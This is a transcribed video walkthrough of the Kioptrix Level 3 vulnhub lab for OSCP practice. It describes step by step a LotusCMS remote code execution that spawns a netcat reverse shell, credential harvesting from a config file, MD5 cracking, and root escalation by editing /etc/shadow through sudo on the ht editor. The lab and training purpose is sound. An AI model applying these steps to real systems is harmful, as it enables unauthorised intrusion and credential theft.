Hello hackers, and welcome to another OSCP prep video. In this video we're actually going to go through another Kioptrix machine, another relatively easy Kioptrix machine, and this is Kioptrix Level 3 or 1.2. This is how you're finding it on vulnhub. So the vector of attack for this machine was Lotus CMS, or that's how I got into the machine. Now, after that, the privilege escalation part could have been done in two ways. It could have been done using an exploit, or it could have been done through the misconfigurations of the server, which is what I choose. Also, for the user, you would have been able to get into the machine via Metasploit or manually. And my idea in preparation for the OSCP is to try to go manually as much as possible, which is why I also, for privilege escalation, I'm also going to focus on not the exploit, but actually the relative misconfiguration of the server, or the intentional misconfiguration of the server. All right, so let's actually get into it. So we're going to start with a netdiscover -I for the interface, ETH0, -R for the range, 192.168.152.0. So I know that my Kali machine is on 152, which is why I'm going to scan in this subnet 0/24. And this should be done really quickly. We can see that the IP of Kioptrix 3 is 134. So let's actually start with the nmap, and like I've explained in the previous video, I've actually reconsidered my nmap scan for these machines. So I'm using half open synscan -A, which replaces -sc for default script, -sv for versioning, -- traceroute, and it also replaces -o for detecting the operating system. So you could either do all of these, or you could simply do -a. Then I'm doing -vv for higher verbosity, -p- for all ports. I believe 65,535. Now the IP 192.168.152.134, and will output normally to Kio 1.2. Okay, and this should not take too long. But until it finishes, we can investigate it further. We can see that there is an open port 80, so we have a web service running, which is why I'm actually going to go to Firefox, and this is the default page for port 80. We can see LightGoat security, GotGoat security, blah blah blah. Copyright 2011, so this is obviously a very old machine. We can see blog over here, and there's also login. So you could simply look into the source code of all of these pages and see if you can find anything useful. You could also go to the login, which is what I did probably the first, that's probably the first thing that I did when I saw it. And I can see over here, powered by Lotus CMS. Okay, so before we proceed further, in the meantime, the nmap scan has finished. So we can see 22 SSH is open, some default script outputs. We can also see that we have 80 open, as previously specified. We can see some of the guest versions, traceroute, and that's just about it. So normally when I see a web server running, I usually do derb http 192.168.150.2.134 with the default common.txt. So everything default over here. I didn't insist too much on derb because it didn't reveal important information for this machine, but for the sake of exemplification, I'm just going to leave it running. Okay, so in the meantime, what I saw here was powered by Lotus CMS. So the first thing that I tried was to look for Lotus CMS exploit. Let's just pin this. And as you can see over here, there are quite a few results. We have something for Metasploit. And like I said in the very beginning of this video, I'm trying to do manually as much as possible. So I didn't look into this Metasploit exploit. So I'm going to actually save you some time and not go through each of them, but I'm going to go specifically on the one that I've used. So it's this one, this default, this GitHub page. So I looked into the remote code execution.sh. So over here, just to like pause for a moment. I have the write-up. I started doing the write-ups in OneNote because it is very convenient and I can actually access them from anywhere. So we might, if we get stuck during this video, we might as well look into this file. And this is also going to be very good when reviewing these machines right before the OSCP exam, because it would actually refresh my memory and help me renew some of the concepts that I learned throughout doing these machines. Okay, now going back on track, it took me some time until I examined how this code works. And what I see that, so I'm not actually going to run this .sh file because I think I tried running it and it didn't work. What I actually did was to see, so it's going to do a request to the index.php and page equals index, and then so it's going to do a request at index.php, and then we'll have some post data. So this is going to be in this function vulncheck. It's going to do a post request to this, and we're actually going to look into what that means in a minute. So we are going back to the index.php into this administration panel, and we can see, so if we go back and hit enter on the index.php, oh, and by the way, getting back to here, I also tried a SQL injection on this administration panel. I believe that's one of the first things that I tried, unsuccessfully, of course. So index.php, let's actually go to index.php. Okay, so what I've been using for this purpose, you could either use burp or you could use the hackbox toolbar or hackbar toolbar, which is this one. And like I said, we're going to do a post request with this post data on the index.php. So over here, we're going to load the URL index.php and enable post data. And over here, we're actually going to copy this. So this is actually a remote code execution, and paste it over here. So this is URL encoded. And for that purpose, if we want to see what it actually means, let's try an URL decoded. URL encoder decoder and see what it actually means. In the meantime, we could see if derb has finished. So derb with everything default options, it found 17 directories. So we've been only looking for directories and not files. All right, so anyway, let's just decode this. And this actually means this is the vulnerability that was discovered in Lotus CMS. Okay, so if we execute this, we should see hooded Robin somewhere over here. And you might not be able to see it clearly because it's in small text, but we can see that there's hooded Robin. Right, so we can now modify this instead of print to actually throw us, give us a reverse shell, a reverse Netcat. So for that, I'm going to set up a listener on port 449, which is, I don't know why I'm found in this port. So we're listening to 449 and my IP is, I believe, 133. Okay. So instead of printing this stuff, we could do a system NC 192.168.152.133, which is my IP on port 449, and give us a bin bash shell. Okay, quotation, closing the parenthesis. And if we execute this right now, we should get a, this should send us a shell on to our listener over here. So let's click on execute. And we have a syntax error, of course, because I started with double quotes and I'm finishing it with single quotes, which is not right. Okay, and I didn't get any shell, of course. So if we execute it, it should be okay. Yeah. All right. So right now at this point, we are inside the machine. ID, so we are data. Okay, let's get out of this shell with Python -c import pti spawn bin bash. So notice if I'm starting with double quotes and I need to quote again inside the double quotes, I'm using single quotes and then finishing off with the double quotes. Okay, so ID, we can see that our shell isn't so good because it doubles the anything I type. Let's try again and see if we could get a better, or at least we could get a shell without having that type of error. Let's listen on port 450 and go back to over here, port 450. Let's just stop this and then we should execute it one more time. Hopefully we get a better shell. If not, we're just gonna work with whatever we have in there. Okay, so I had to restart the machine because I wasn't able to get another working shell. It wasn't responding to any command. So the post request was sort of like frozen. All right, now let's start another listener on port 449 again, and hopefully this time would actually have at least a very decent shell that we could work with. So we execute this command on port 449. And lo and behold, nothing happens. So once again, ifconfig 152.133, 152.133, of course, it's port 449. Now execute. All right. Okay. Let's Python. So this actually sucks. Python -c import pti.spawn. Hopefully I'm not making any errors here. Bin bash. Okay, so it actually failed. Once again, -lvp. Let's go 450 this time. Let's do port 450. Execute. Python -c import pti.spawn bin bash. Okay, so we've got the same shitty shell. All right, so we're actually going to try and work with this. So the first thing that I'm going to do, ls-a, present working directory, we are in home /Kioptrix. Let's do uname-a. So uname-a tells us that this is a Linux Kioptrix 2.6.24. So if, like I told you, there are multiple ways to get to the root of this machine, and one of them is through finding out if there's some sort of local privilege escalation root exploit or something like that, which is why we could simply Google for Linux 2.6.24 exploit. I don't think we need this hack bar for now. Let's just hide it. So we can see that there is at least one exploit for this version, and which is Dirty Cow. And I believe there are multiple versions of Dirty Cow, and one of them crashes the system and others don't crash the system. So I actually tried, if we look over here in my folder, I tried, let's see, tail dirty.c. Let's actually look at the head dirty.c. This is the one that I've tried, and it crashed the system, or it made the system unresponsive, but it actually gave me root. So this is one way, and I'm not actually going to do this because I don't want to reset the machine one more time. So Dirty Cow is one way to exploit or to get to the root of this machine to obtain ultimate user privileges. However, the thing that I'm going to focus on right now for privilege escalation is to do it manually through some sort of misconfigurations of the system. And for that, what I usually do is to try to enumerate as much as possible, go through known folders and configuration files, run scripts like lin and num, which, as you can see, is over here. So I could python -m simple http server on port 80, and then over here I would go to cd dev shm, and I would wget 192.168.152.133 lin enum december 18.sh. And if we look, it's over there. And what I could actually do now, change mode +x. And in this case, I would change the mode to lin. Again, change mode +x. This is disturbing. Lin enum dec 18 and then I would actually execute it with lin enum dac18.sh and into, let's say, out.txt. And this could take some time, but I would actually run it. So it should actually take, I don't know, maybe 15 to 30 seconds until it finishes, and it outputs to out.txt. What I would also do, so before we look into this, what I would also do is to find SUID or GUID files. So for SUID, let me actually show you the command more clearly. For SUID, I would do find -perm -u equals s type -type f2 greater than dev null. And for GUID files, I would say -g equals s. And for this machine, for Kioptrix level 3, there wasn't any interesting SUID or GUID file. If we look into out.txt, we can go through the file line by line and actually see if there's anything interesting. I would look for cron jobs. I would look for misconfigured services, for files with wrong permissions, or files with inappropriate permissions, if I can put it that way. Okay, so this is not the purpose of the video. So we can see something over here. The bash history shows sudo ht exit. We could go to home and see the folders is drag, lone forrat, and dub. Let's go look into drag, ls-a, nothing interesting over here. Let's go into lone forrat, and we can see something that's not ordinary. So company policy.readme and checksec.sh. So checksec is a script. I tried looking for ways to privilege escalate to checksec, but I couldn't find any. So this actually looks for, I believe if we do checksec.sh, it tells us what it does, and it tells us how to use it. We can do a search on checksec.sh. We can look into the official repository. And it tells us that is a bash script to check the properties of executables, blah, blah, blah. Anyway, the key to this Kioptrix level 3 for me was to keep enumerating, because I got stuck at multiple points, and I haven't actually looked at any hints for this machine, even though I was very tempted to. I kept on enumerating, so I really understand that enumeration is a very, very important part of the process. So if we go back to ls-a cd dub, we go into Kioptrix3.com, and I'm going to do my best to actually get out of this shell immediately. And I kept enumerating until I went into, so I looked into all of these folders, into cache, into core, into data, into modules, and the last one that I went into was the gallery. And lo and behold, in this folder I found some interesting file called gconfig.php, and I looked what's inside it. gconfig.php. This is really disturbing. And I saw that we have a MySQL configuration root FUCK-EU. So fuck EU. Okay. And I tried, the very next thing that I tried was to log in with root -p FUCK-EU, and we are inside the MySQL database. If we look at show databases, we can see MySQL gallery and information schema, and the juicy part in this MySQL database is to look into the gallery. So gallery with double or quadruple L, use gallery. Okay, show tables. We can see a couple of tables. The first one that I looked into was this gallerific users, but then I found something more interesting, dev accounts. So select all from dev accounts, and we can see our usernames, LordOfTheRoot, and the passwords, which are MD5. So if we look for so drag wasn't an interesting user. The interesting stuff was for LordOfTheRoot. So I'm going to try to reverse this hash, Control-Shift-C, and then let's go to hash killer, I guess. So hash killer. And right now, so hopefully we're gonna get out of that disturbing shell. So if we reverse this hash, crack my hash. Did I copy it correctly? So Control-Shift-C. Okay, so it's an MD5, is the MD5 of Star Wars. All right, now we could just leave this. So when you want to get out of the MySQL shell, you can do // or / exclamation bash -i, and we still have a very malfunctioning shell. But anyway, now that we have the password, we can just simply SSH into LordOfTheRoot at 192.168.152.134 with the password Star Wars. Okay, so right now we have a well-working SSH shell. All right, so we are LordOfTheRoot right now. So we want to escalate our privileges to root. The first thing that I usually do is to look into sudo -l. And over here we can see that we can sudo user bin su with no password, but this actually doesn't work. And then we can also sudo with the ht. And I looked for what this ht is, and this is actually an editor, a text editor. So the first thing that came to my mind when I saw that I can run this text editor with administrative privileges was to actually, what do you think? Was to modify the etc shadow file. So let's actually try sudo ht. And we get error opening terminal xterm caller. So it cannot open the xterm caller. And after a little bit of searching, I found out that I should export term equals to xterm And now if we look into this environmental or environment variable echo term, we can see that our terminal is xterm, and now I can successfully sudo into ht, and I would go straight to etc shadow. Since I have root privileges, I could modify whatever file I want. Okay, so once we are inside this text editor, we can see this is the password for root. So what I'm actually what I want to do is to modify this and to actually replace this with a hash, an MD5. So let me just copy this. It's not actually gonna copy well, but I'm going to try to correct it. So let me just actually paste it. Let me paste it over here and delete whatever is not necessary. So we're gonna delete that. We're also gonna delete that. The first delimiter tells us whether we're using an MD5 or a SHA password, and 1 is for MD5, 5 is for SHA, and I think there's also 3, I'm not really sure. Then the next delimiter is our salt, and finally we have our hashed password. Okay, so there are a few ways to replace this hash inside our etc shadow, and one of the easiest ways, so I'm going to pop up another terminal here, is to use OpenSSL password -1, which is to specify MD5, and then we're actually gonna type the password that we want. Let's say the password is secret, so SECRET, verifying password, so we type secret one more time, and we get the entire string that we want to replace inside the etc shadow file. So we're going over here and to navigate this, so right now we are in the hex side of the etc shadow. If we want to move into the text side of it, we hit the tab, and then with the arrow keys we just go to the exact location that we want to start replacing the string. And what I'm actually going to hit is the F4 key, so F4 to enter in edit mode, and I'm simply going to hit Ctrl-Shift-V to actually replace the entire string from the very beginning, from the location that I was pointing to. So my cursor was over here, and I could simply Ctrl-Shift-V one more time, and we can see it went all the way up to the colon delimiter. All right, and now what we want to do is to hit Alt-F and then go to save, and once again Alt-F and then go to quit, or simply hit F10. All right, so right now we can su into root with the password secret. So once again, su with the password secret. So for whatever reason it doesn't want to take it. I'm not really sure why, but if we exit this and we SSH into root at 192.168, so probably there was some malfunctioning with the SSH shell, 152.134, and we try the secret as password, we can see that we are root on Kioptrix. If we go to cd root, we can see this congrats.txt. So I'm not sure why I wasn't able to. Let's go to loan for rat with the password. We don't have to specify the password, but if we try to sue once again to root with the password secret, it seems to be working. So there was some malfunctioning of the SSH shell that I was running. Too many malfunctions with this walkthrough, but anyway. Alright guys, so this was Kioptrix Level 3 in a nutshell. Like I said, we could have used Metasploit, we could have used automated scripts to actually get to the top of this machine. We could use a dirty cow for privilege escalation, but we went the manual way by trying to escalate our privileges through misconfigurations or intended misconfigurations, which was this one. I wouldn't say that this is necessarily an unreal scenario, because sometimes users may have privileges of using editors, text editors like HT or Vim or less with root privileges, and when that happens you could actually escalate your privileges to root through those attack vectors. So anyway, I hope you guys enjoyed this OSCP prep walkthrough video of Kioptrix Level 3. I'm going to do more videos as I keep going through these OSCP-like machines, and this is in preparation for me actually starting the coursework. Once again, I hope you found this useful. If you did, please make sure to like, subscribe, and share this video with anyone interested in the OSCP, cybersecurity, and penetration testing. And with that said, thank you for watching, and I'll be seeing you in the next video.